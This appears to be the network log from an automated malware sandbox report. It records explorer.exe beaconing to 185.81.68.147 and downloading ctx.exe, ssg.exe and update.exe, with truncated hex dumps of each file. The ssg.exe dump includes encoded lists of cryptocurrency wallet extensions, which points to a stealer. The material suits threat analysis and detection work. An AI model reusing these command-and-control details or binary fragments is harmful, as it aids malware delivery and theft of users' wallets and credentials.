                                                                                                                                                                                                2192.168.2.1149720185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:18:46.373603106 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:18:46.493392944 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:18:47.866478920 CET349INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:18:47 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 131
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 04 1f 5e 16 10 48 5f 4a 1e 00 5b 56 1e 08 02 4d 00 5e 4b 55 0d 02 1e 55 11 40 18 56 1a 5c 6f 6f 52 48 0d 46 47 16 08 1b 1b 52 0e 57 4a 00 54 4b 07 09 4d 52 04 07 1c 10 45 01 4b 01 41 50 3c 3c 54 44 5e 47 16 49 58 4a 4d 05 5d 07 1d 5e 03 1a 02 5b 18 53 50 0f 4a 10 41 55 02 17 55 1e 56 1b 53 6b 6f 54 45 5d 45 42 15 02 19 1c 53 01 57 4b 5a 05 4b 04 0b 48 03 00 03 4c 51 04 1c 16 00 1d 54 3c 69
                                                                                                                                                                                                Data Ascii: ^H_J[VM^KUU@V\ooRHFGRWJTKMREKAP<<TD^GIXJM]^[SPJAUUVSkoTE]EBSWKZKHLQT<i


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.1149726185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:18:48.001410007 CET232OUTGET /ctx.exe HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337707996 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:18:48 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 15:45:48 GMT
                                                                                                                                                                                                ETag: "5a452c-628ec5ffff268"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 5915948
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 2c 62 58 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 2a 4f [TRUNCATED]
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd,bXg"(X@*OZ`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337728977 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.LHuHVHM
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337750912 CET448INData Raw: 48 83 c4 20 41 5f 41 5e 5e c3 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cf e8 53 e5 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 00 a4 02 00 48 8d 0d 35 a4 02 00 e8 a4 12 00 00 e9 bb 00 00 00 8b 4e 0c e8 a7 2c 01 00 4c 8b f0 48 85 c0 75 20 44 8b 4e
                                                                                                                                                                                                Data Ascii: H A_A^^VE3HISyLFHH5N,LHu DNLFH H-t~uME3HIc^Hl$@IH|$HLd$PHt8A fDI;HMAIGHHnHrBHH+u3H|$HHl$@Ld$PtI
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337763071 CET1236INData Raw: 4c 89 7c 24 20 48 8b cb e8 21 29 00 00 4c 8b f8 48 85 c0 75 1a 48 8d 57 12 48 8d 0d 16 a2 02 00 e8 89 0f 00 00 bb ff ff ff ff e9 54 01 00 00 8b 57 04 45 33 c0 48 03 93 00 10 00 00 49 8b cf e8 6e e3 00 00 85 c0 79 21 4c 8d 47 12 48 8d 15 1b a2 02
                                                                                                                                                                                                Data Ascii: L|$ H!)LHuHWHTWE3HIny!LGHHPuE3MHI.Ll$03A Lt$(A*LHu!LGHH^Ht$XwHHl$P@ffI;H
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337775946 CET1236INData Raw: e9 93 00 00 00 48 8b 93 08 10 00 00 48 3b 93 10 10 00 00 0f 83 7f 00 00 00 44 8b 05 e2 c4 03 00 66 0f 6f 0d 52 9f 02 00 66 90 33 c0 41 83 f8 02 7c 18 f3 0f 6f 02 66 0f 38 00 c1 f3 0f 7f 02 eb 1a 66 0f 1f 84 00 00 00 00 00 8b 0c 82 0f c9 89 0c 82
                                                                                                                                                                                                Data Ascii: HH;DfoRf3A|of8fHH|JAtdtntxt2HH;rHH$HH$H3L$I[ Ik(I_LD$LL$ SUVWH8IHl$
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337788105 CET1236INData Raw: 0f b7 44 24 6c 48 8b cf 0f b7 54 24 68 66 44 2b 44 24 64 66 2b 54 24 60 e8 e9 00 00 00 48 8b 8c 24 70 02 00 00 48 33 cc e8 59 98 00 00 4c 8d 9c 24 80 02 00 00 49 8b 5b 18 49 8b 6b 20 49 8b 73 28 49 8b e3 5f c3 48 89 5c 24 08 57 48 83 ec 20 49 8b
                                                                                                                                                                                                Data Ascii: D$lHT$hfD+D$df+T$`H$pH3YL$I[Ik Is(I_H\$WH IHtftZt(uA@f;wAH\$0H _LIY\HH\$0H _:LIH(E33H*H\$03
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337800980 CET1236INData Raw: 48 85 db 74 10 45 33 c0 33 d2 48 8b cb e8 e0 61 00 00 48 8b e8 48 85 ed 4c 8d 05 c3 96 02 00 49 8b d6 48 8b cf 4c 0f 45 c5 e8 14 fe ff ff 48 8b cf 8b d8 e8 66 1c 01 00 49 8b ce e8 5e 1c 01 00 48 8b cd e8 56 1c 01 00 48 8b 6c 24 38 8b c3 48 8b 5c
                                                                                                                                                                                                Data Ascii: HtE33HaHHLIHLEHfI^HVHl$8H\$0Ht$@H|$HH A^LD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHH8_^][LD$LL$ SUVWH8IHl$xHH
                                                                                                                                                                                                Dec 13, 2024 08:18:49.338030100 CET1236INData Raw: 00 04 00 00 48 8b 08 48 83 c9 01 e8 56 15 01 00 41 b9 30 00 00 00 4c 8d 05 a1 92 02 00 48 8d 54 24 30 33 c9 ff 15 0c 8a 02 00 48 8b 8c 24 30 08 00 00 48 33 cc e8 a4 8e 00 00 48 81 c4 48 08 00 00 5f 5b c3 cc cc cc cc cc cc cc cc cc cc 48 89 54 24
                                                                                                                                                                                                Data Ascii: HHVA0LHT$03H$0H3HH_[HT$LD$LL$ SVWPtH+H:H3H$@HH$L$xHT$@Ht$(A3HHHt$ Ht$0AH5D$(DHt$ 35H
                                                                                                                                                                                                Dec 13, 2024 08:18:49.338061094 CET1236INData Raw: 85 02 00 8b 53 0c 48 8b cd 48 8b 05 b2 0f 04 00 ff 15 e4 85 02 00 48 8b cd 48 8b f8 e8 d5 12 01 00 48 85 ff 0f 84 9d 01 00 00 48 8b 05 c1 0f 04 00 48 8d 15 02 90 02 00 4c 8b c7 49 8b cf ff 15 b6 85 02 00 48 8b 05 4f 0f 04 00 4d 8b c4 49 8b d4 48
                                                                                                                                                                                                Data Ascii: SHHHHHHHLIHOMIHHtbHHHH;3H$H$H$L$`L$hH$PH3VHpA_A]^HLD$8HT$0HL$@HLD$8HT$0HL$@
                                                                                                                                                                                                Dec 13, 2024 08:18:49.338073969 CET1236INData Raw: 8b ac 24 e8 30 00 00 48 8b bc 24 28 31 00 00 48 8b ac 24 18 31 00 00 4c 39 74 24 30 74 24 48 8d 44 24 30 0f 1f 00 48 8b c8 e8 38 e5 ff ff 48 8d 44 24 30 4d 8d 76 01 4a 83 3c f0 00 4a 8d 04 f0 75 e4 8b c3 48 8b 8c 24 d0 30 00 00 48 33 cc e8 e2 84
                                                                                                                                                                                                Data Ascii: $0H$(1H$1L9t$0t$HD$0H8HD$0MvJ<JuH$0H3H0A^[@SH H$H(0HtMH(0H [@S0@H+HJH3H$ @HHT$ 3A|uHH_
                                                                                                                                                                                                Dec 13, 2024 08:18:49.458576918 CET1236INData Raw: 78 e8 ec 4b 00 00 48 89 87 38 30 00 00 48 85 c0 75 0c 48 8d 0d 19 87 02 00 e9 d7 fe ff ff 48 8b cf e8 0c 44 00 00 85 c0 79 4f 48 8d 0d 49 87 02 00 e9 bf fe ff ff 48 8d 57 10 48 8d 4c 24 60 e8 3e 06 00 00 4c 8b 87 48 30 00 00 48 8d 8f 22 20 00 00
                                                                                                                                                                                                Data Ascii: xKH80HuHHDyOHIHWHL$`>LH0H" MtHT$`qLL$`LiH" AHT$`NHuHTHL$`x t! ,H HHH2uY8 tHH,


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.1149748185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:18:58.897109032 CET232OUTGET /ssg.exe HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225151062 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:18:59 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT
                                                                                                                                                                                                ETag: "4b200-629107cd804d2"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 307712
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @<O H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225176096 CET1236INData Raw: 39 00 6c 00 61 00 47 00 78 00 6c 00 5a 00 6d 00 35 00 72 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00
                                                                                                                                                                                                Data Ascii: 9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Np
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225188971 CET448INData Raw: 62 00 32 00 31 00 69 00 59 00 58 00 51 00 4b 00 5a 00 6d 00 68 00 70 00 62 00 47 00 46 00 6f 00 5a 00 57 00 6c 00 74 00 5a 00 32 00 78 00 70 00 5a 00 32 00 35 00 6b 00 5a 00 47 00 74 00 71 00 5a 00 32 00 39 00 6d 00 61 00 32 00 4e 00 69 00 5a 00
                                                                                                                                                                                                Data Ascii: b21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225316048 CET1236INData Raw: 66 00 46 00 4e 00 68 00 64 00 48 00 56 00 79 00 62 00 6c 00 64 00 68 00 62 00 47 00 78 00 6c 00 64 00 41 00 70 00 6d 00 62 00 6d 00 70 00 6f 00 62 00 57 00 74 00 6f 00 61 00 47 00 31 00 72 00 59 00 6d 00 70 00 72 00 61 00 32 00 46 00 69 00 62 00
                                                                                                                                                                                                Data Ascii: fFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcH
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225331068 CET1236INData Raw: 48 68 58 70 45 fd 19 8f de 6c 87 94 7b f8 b7 52 73 d3 23 ab 4b 02 e2 72 1f 8f 57 e3 55 ab 2a 66 eb 28 07 b2 b5 c2 03 2f c5 7b 9a 86 37 08 a5 d3 28 87 f2 30 bf a5 b2 23 03 6a ba 02 16 82 5c ed cf 1c 2b 8a 79 b4 92 a7 07 f2 f0 f3 69 e2 a1 4e da f4
                                                                                                                                                                                                Data Ascii: HhXpEl{Rs#KrWU*f(/{7(0#j\+yiNe4b.S4U2u9`@q^nQ!>=>FMT]qoP`$@CwgB[8y|GB|+H2pZrNl8V=-9'6d
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225433111 CET1236INData Raw: 6f 00 63 00 65 00 73 00 73 00 49 00 6e 00 66 00 6f 00 6f 00 63 00 65 00 73 00 73 00 20 00 57 00 68 00 65 00 72 00 65 00 20 00 53 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 6e 00 66 00 6f 00 65 00 73 00 73 00 69 00 6f 00 6e 00 49 00 64 00
                                                                                                                                                                                                Data Ascii: ocessInfoocess Where SProcessInfoessionId='cc||ww{{kkooTP`00gg}V++bMvvE@}}YYGGAg_E#Srr[u=jL&&Zl66A~?
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225445032 CET1236INData Raw: 3b ab 6b cb 1f 9d 45 f1 ac fa 58 ab 4b e3 03 93 20 30 fa 55 ad 76 6d f6 88 cc 76 91 f5 02 4c 25 4f e5 d7 fc c5 2a cb d7 26 35 44 80 b5 62 a3 8f de b1 5a 49 25 ba 1b 67 45 ea 0e 98 5d fe c0 e1 c3 2f 75 02 81 4c f0 12 8d 46 97 a3 6b d3 f9 c6 03 8f
                                                                                                                                                                                                Data Ascii: ;kEXK 0UvmvL%O*&5DbZI%gE]/uLFk_mzRY-Xt!Ii)DujyxX>k'qO f}:cJ1Q3`bSEdwk+pHhXElR{s#rKWfU*(/{70(#j\
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225456953 CET896INData Raw: cc 4f 83 cc 34 5c 68 34 a5 f4 51 a5 e5 34 d1 e5 f1 08 f9 f1 71 93 e2 71 d8 73 ab d8 31 53 62 31 15 3f 2a 15 04 0c 08 04 c7 52 95 c7 23 65 46 23 c3 5e 9d c3 18 28 30 18 96 a1 37 96 05 0f 0a 05 9a b5 2f 9a 07 09 0e 07 12 36 24 12 80 9b 1b 80 e2 3d
                                                                                                                                                                                                Data Ascii: O4\h4Q4qqs1Sb1?*R#eF#^(07/6$=&'iN'uu,tX,.4-6nnZZ[RR;Mv;a}){R)>/q^/SSh, `@ y[[jjFg9Kr9JJLLXXJk*O
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225629091 CET1236INData Raw: 43 00 6d 00 5a 00 75 00 61 00 6d 00 68 00 74 00 61 00 32 00 68 00 6f 00 62 00 57 00 74 00 69 00 61 00 6d 00 74 00 72 00 59 00 57 00 4a 00 75 00 5a 00 47 00 4e 00 75 00 62 00 6d 00 39 00 6e 00 59 00 57 00 64 00 76 00 5a 00 32 00 4a 00 75 00 5a 00
                                                                                                                                                                                                Data Ascii: CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV0CmFpaWZibmJmb2JwbWVla2lwaGVlaWppbWRwbmxwZ3BwfFRlcnJhU3RhdGlvbg
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225641012 CET1236INData Raw: 68 00 75 00 5a 00 57 00 64 00 70 00 62 00 57 00 35 00 38 00 54 00 47 00 6c 00 78 00 64 00 57 00 46 00 73 00 61 00 58 00 52 00 35 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 68 00 74 00 5a 00 57 00 39 00 69 00 62 00 6d 00 5a 00
                                                                                                                                                                                                Data Ascii: huZWdpbW58TGlxdWFsaXR5V2FsbGV0CmhtZW9ibmZuZmNtZGtkY21sYmxnYWdtZnBmYm9pZWFmfFhkZWZpV2FsbGV0CmxwZmNiamtuaWpwZWVpbGxpZm5raWtn
                                                                                                                                                                                                Dec 13, 2024 08:19:00.345211983 CET1236INData Raw: 46 00 6e 00 62 00 57 00 5a 00 77 00 5a 00 6d 00 4a 00 76 00 61 00 57 00 56 00 68 00 5a 00 6e 00 78 00 59 00 5a 00 47 00 56 00 6d 00 61 00 56 00 64 00 68 00 62 00 47 00 78 00 6c 00 64 00 41 00 70 00 73 00 63 00 47 00 5a 00 6a 00 59 00 6d 00 70 00
                                                                                                                                                                                                Data Ascii: FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdm


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.1149755185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:01.415565014 CET235OUTGET /update.exe HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743599892 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:02 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 05:53:20 GMT
                                                                                                                                                                                                ETag: "4b400-6290c54e671ba"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 308224
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 7a 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$a\i%=:%=:%=:,EJ:&=:%=:&=:JKr:-=:JKC:$=:JKD:$=:Rich%=:PEd<zZg":*\4@@@h((@P .text9: `.rdataP>@@.datap@.pdata@X@@.rsrc(\@@.x64`T`
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743619919 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89
                                                                                                                                                                                                Data Ascii: HT$HL$H8HL$@?HD$(HT$HHL$(?HD$ HD$ H8HT$HL$H8HL$@7`HD$(HT$HHL$(*`HD$ HD$ H8H
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743634939 CET1236INData Raw: 88 41 00 00 48 8d 0d 99 41 00 00 e8 bc fb ff ff 48 89 05 85 5d 00 00 48 8d 15 96 41 00 00 48 8d 0d a7 41 00 00 e8 a2 fb ff ff 48 89 05 83 5e 00 00 48 8d 15 a4 41 00 00 48 8d 0d ad 41 00 00 e8 88 fb ff ff 48 89 05 71 5e 00 00 48 8d 15 aa 41 00 00
                                                                                                                                                                                                Data Ascii: AHAH]HAHAH^HAHAHq^HAHAnH_^HAHATHM^HAHA:H;^HAHA H)^HAHAH^HAHAH^HAHA
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743649006 CET672INData Raw: ff ff 48 89 05 1f 58 00 00 48 8d 15 58 43 00 00 48 8d 0d 61 43 00 00 e8 dc f6 ff ff 48 89 05 15 58 00 00 48 8d 15 5e 43 00 00 48 8d 0d 67 43 00 00 e8 c2 f6 ff ff 48 89 05 03 58 00 00 48 8d 15 64 43 00 00 48 8d 0d 6d 43 00 00 e8 a8 f6 ff ff 48 89
                                                                                                                                                                                                Data Ascii: HXHXCHaCHXH^CHgCHXHdCHmCHWHjCHsCHWHpCHyCtHWHvCHCZHWHCHC@HWHCHC&HXHCHCHW
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743664980 CET1236INData Raw: 00 e8 52 f4 ff ff 48 89 05 2b 56 00 00 48 8d 15 54 44 00 00 48 8d 0d 5d 44 00 00 e8 e8 f3 ff ff 48 89 05 e1 57 00 00 48 8d 15 5a 44 00 00 48 8d 0d 63 44 00 00 e8 ce f3 ff ff 48 89 05 cf 57 00 00 48 8d 15 60 44 00 00 48 8d 0d 69 44 00 00 e8 04 f4
                                                                                                                                                                                                Data Ascii: RH+VHTDH]DHWHZDHcDHWH`DHiDHVHfDHoDHVHlDHuDHUHrDH{DHUHxDHDHUH~DHDHT3HHLD$HT$HL$
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743679047 CET1236INData Raw: 89 84 24 40 01 00 00 48 8d 84 24 42 01 00 00 48 8b f8 33 c0 b9 06 02 00 00 f3 aa c6 84 24 18 01 00 00 00 8b 84 24 b0 0a 00 00 89 84 24 90 0a 00 00 83 bc 24 90 0a 00 00 00 74 16 83 bc 24 90 0a 00 00 01 74 2a 83 bc 24 90 0a 00 00 03 74 3e eb 5a 45
                                                                                                                                                                                                Data Ascii: $@H$BH3$$$$t$t*$t>ZE3H$@V$AE3H$@x$#E3H$@$$uH$ HD$HH$HD$@HD$8HD$0D$(
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743701935 CET1236INData Raw: 00 00 e9 2f ff ff ff 48 c7 44 24 58 00 00 00 00 48 8b 84 24 f0 00 00 00 48 8b 40 30 48 8b 8c 24 10 01 00 00 48 2b c8 48 8b c1 48 89 44 24 58 48 8b 84 24 f0 00 00 00 48 8b 8c 24 10 01 00 00 48 89 48 30 c7 84 24 54 0a 00 00 00 00 00 00 eb 10 8b 84
                                                                                                                                                                                                Data Ascii: /HD$XH$H@0H$H+HHD$XH$H$HH0$T$T$TH$@9$THD$pHc@<HL$`HHHc$THk(HH$AH~<H$LHtH$@$\H$HH$`
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743717909 CET1236INData Raw: eb 07 e9 71 ff ff ff 33 c0 48 83 c4 28 c3 cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 68 48 c7 44 24 38 00 00 00 00 48 c7 44 24 48 00 00 00 00 48 c7 44 24 28 00 00 00 00 48 c7 44 24 50 00 00 00 00 48 c7 44 24 40 00 00 00 00 c7 44 24 20 00 00 00 00
                                                                                                                                                                                                Data Ascii: q3H(HL$HhHD$8HD$HHD$(HD$PHD$@D$ D$0HD$pHD$8HD$8Hc@<HL$8HHHD$HHD$H@=u|$0t3'HD$H@=u|$0t3t3kHD$HHHD$(HT$8HD$(HL$8HHH
